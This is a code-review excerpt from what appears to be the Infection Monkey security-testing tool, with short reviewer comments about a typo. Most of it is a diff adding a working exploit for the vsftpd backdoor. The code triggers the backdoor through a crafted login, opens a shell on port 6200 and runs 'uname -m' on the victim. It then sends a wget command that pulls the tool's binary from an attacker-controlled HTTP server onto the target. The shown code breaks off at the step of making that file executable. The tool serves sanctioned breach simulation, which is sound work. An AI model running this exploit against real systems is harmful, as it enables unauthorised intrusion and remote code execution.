monkey/infection_monkey/exploit/vsftpd.py

```diff
@@ -0,0 +1,121 @@
+class VSFTPDExploiter(HostExploiter):
+    _TARGET_OS_TYPE = ['linux']
+    
+    def __init__(self, host):
+        self._update_timestamp = 0
+        super(VSFTPDExploiter, self).__init__(host)
+        self.skip_exist = self._config.skip_exploit_if_file_exist
+
+    def exploit_host(self):
+        try:
+            LOG.info('Attempting to trigger backdoor...')
+            ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+            ftp_socket.connect((self.host.ip_addr, FTP_PORT))
+            ftp_socket.recv(128).decode('utf-8')
+            # Attempt to login to trigger backdoor
+            ftp_socket.send(USERNAME)
+            ftp_socket.recv(128).decode('utf-8')
+            ftp_socket.send(PASSWORD)
+            ftp_socket.recv(128).decode('utf-8')
+            ftp_socket.close()
+            LOG.info('Triggered backdoor')
+
+        except socket.error as e:
+            LOG.error('Failed to trigger backdoor on %s' , self.host.ip_addr)
+
+        try:
+            LOG.info('Attempting to connect to backdoor...')
+            backdoor_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+            backdoor_socket.connect((self.host.ip_addr, 6200))
+            LOG.info('Connected to backdoor on %s:6200', self.host.ip_addr)
+            
+            command = str.encode("uname -m" + '\n')
+            backdoor_socket.send(command)
+            response = backdoor_socket.recv(128).decode('utf-8')
+            LOG.info('Response for uname -m: %s', response)
+            if '' != response.lower().strip():
+                #command execution is successful
+                self.host.os['machine'] = response.lower().strip()
+                self.host.os['type'] = 'linux'
+
+            else :
+                LOG.info("Failed to execute command uname -m on victim %r ",self.host)
+
+            src_path = get_target_monkey(self.host)
+            LOG.info("src for suitable monkey executable for host %r is %s", self.host,src_path)
+
+            if not src_path:
+                LOG.info("Can't find suitable monkey executable for host %r", self.host)
+                return False
+
+            
+            LOG.info('Connected to backdoor on %s:6200', self.host.ip_addr)
+
+            #copy the monkey into the machine
+            http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
+            dropper_target_path_linux = self._config.dropper_target_path_linux
+            LOG.info("Download link for monkey is %s",http_path)    
+
+            #download the monkey
+            download_command = '/usr/bin/wget %s -O %s;' %  (
+                http_path, dropper_target_path_linux)
+            LOG.info("Download_command is %s",download_command)            
+            
+            command = str.encode(str(download_command) + '\n')
+            backdoor_socket.send(command)
+            http_thread.join(DOWNLOAD_TIMEOUT)
+            http_thread.stop()
+
+            #changeit to executable
```

Comment:
Typo. Also, when commenting add a space after `#`

Reply:
@Dhayalanb you added space, but left the typo. `change it`

Reply:
Fixed it as well.